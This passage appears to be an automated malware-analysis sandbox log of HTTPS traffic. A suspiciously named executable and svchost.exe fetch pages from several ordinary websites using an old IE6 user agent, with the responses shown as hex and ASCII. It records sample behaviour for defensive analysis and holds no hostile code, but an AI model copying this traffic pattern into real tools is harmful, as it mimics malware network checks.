                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1599INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1602INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1610INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1618INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1626INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1634INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1642INData Raw: 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67
                                                                                                                                                                                                                                                                        Data Ascii: form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        96192.168.2.658171188.114.97.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1475OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1475INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=spQ6b1NrSCXgC0TuLf9Wy7HOsZcqZKKWwsFZzlfXV2S%2FAPoKqY04rNOV70VHBpnBAP2v7AWMLgzHH7msSVlob7jpVH9Ba7coT11zgj3HRjolN4bzsfAU3TzyzK%2Fp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a845ee04367b-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1476INData Raw: 31 65 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ea7<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1477INData Raw: 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: ,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1478INData Raw: 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 41 5a 46 53 56 74 50 52 38 79 63 70 47 67 67 2e 69 56 62 42 75 55 32 6a 55 31 47 76 44 52 78 58 75 2e 6e 71 68 31 71 35 57 4b 4d 2d 31 36 37 38 34 33 31 33 38 31 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 2e 32 69 58 30 34 77 33 36 43 6a 31 44 33 4f 36 36 4b 4d 31 79 6a 30 4a 52 50 51 36 54 55 5f 38 5a 44 71 32 67 69 53 32 67 62 51 2d 31 36 37 38 34 33 31 33 38 31 2d 30 2d 41 55
                                                                                                                                                                                                                                                                        Data Ascii: "/?__cf_chl_f_tk=AZFSVtPR8ycpGgg.iVbBuU2jU1GvDRxXu.nqh1q5WKM-1678431381-0-gaNycGzNCPs" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value=".2iX04w36Cj1D3O66KM1yj0JRPQ6TU_8ZDq2giS2gbQ-1678431381-0-AU
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1479INData Raw: 53 74 7a 50 64 51 56 69 31 49 72 53 6c 76 5a 43 55 78 77 43 50 53 59 41 72 4e 58 42 59 30 75 66 73 79 5f 71 4d 58 4f 48 4a 55 6b 6b 74 44 79 57 5a 65 62 6a 4e 4e 37 79 54 4b 70 44 52 4b 78 5f 37 50 44 75 54 56 4c 58 52 4d 33 5f 74 43 67 61 43 2d 39 54 6e 41 46 65 51 37 58 30 54 35 43 6d 46 5f 6b 79 64 39 46 4a 46 7a 4e 79 6e 79 5f 62 37 43 34 66 48 51 42 37 71 74 73 6f 4c 52 77 51 34 47 69 4b 31 41 45 62 7a 73 30 2d 66 2d 4a 7a 33 61 6c 74 72 43 62 72 46 55 73 35 77 4e 70 41 57 76 73 31 47 41 79 52 66 50 6f 75 44 63 56 79 78 58 4a 39 69 70 41 79 6a 6f 42 76 37 6a 46 64 55 51 4d 5a 52 33 45 55 75 58 49 4a 54 4b 4b 47 62 4c 6d 4a 59 79 63 45 4a 75 79 53 37 44 39 76 66 31 5a 58 4a 2d 4e 57 6b 6e 77 51 66 63 31 53 57 72 50 38 48 57 4b 56 7a 31 45 53 47 30 6b
                                                                                                                                                                                                                                                                        Data Ascii: StzPdQVi1IrSlvZCUxwCPSYArNXBY0ufsy_qMXOHJUkktDyWZebjNN7yTKpDRKx_7PDuTVLXRM3_tCgaC-9TnAFeQ7X0T5CmF_kyd9FJFzNyny_b7C4fHQB7qtsoLRwQ4GiK1AEbzs0-f-Jz3altrCbrFUs5wNpAWvs1GAyRfPouDcVyxXJ9ipAyjoBv7jFdUQMZR3EUuXIJTKKGbLmJYycEJuyS7D9vf1ZXJ-NWknwQfc1SWrP8HWKVz1ESG0k
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1481INData Raw: 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 31 30 34 65 64 62 64 36 63 63 33 37 66 65 63 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 41 5a 46 53 56 74 50 52 38 79 63 70 47 67 67 2e 69 56 62 42 75 55 32 6a 55 31 47 76 44 52 78 58 75 2e 6e 71 68 31 71 35 57 4b 4d 2d 31 36 37 38 34 33 31 33 38 31 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 70 6c 56 3a 20 34 2c 0a 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ', cHash: '104edbd6cc37fec', cUPMDTk: "\/?__cf_chl_tk=AZFSVtPR8ycpGgg.iVbBuU2jU1GvDRxXu.nqh1q5WKM-1678431381-0-gaNycGzNCPs", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0', cTplV: 4,
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1482INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 7a 6b 50 4c 44 53 67 50 54 38 68 4b 74 61 49 41 48 39 76 35 66 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b 44 59 49 30 4d 48 64 72 6c 6b 3d 27 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: i2: 'zkPLDSgPT8hKtaIAH9v5fg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7skDYI0MHdrlk=',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1483INData Raw: 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: po.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinfo"> <div clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1484INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        97192.168.2.6582615.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1484OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1484INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:21 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1484INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1500INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
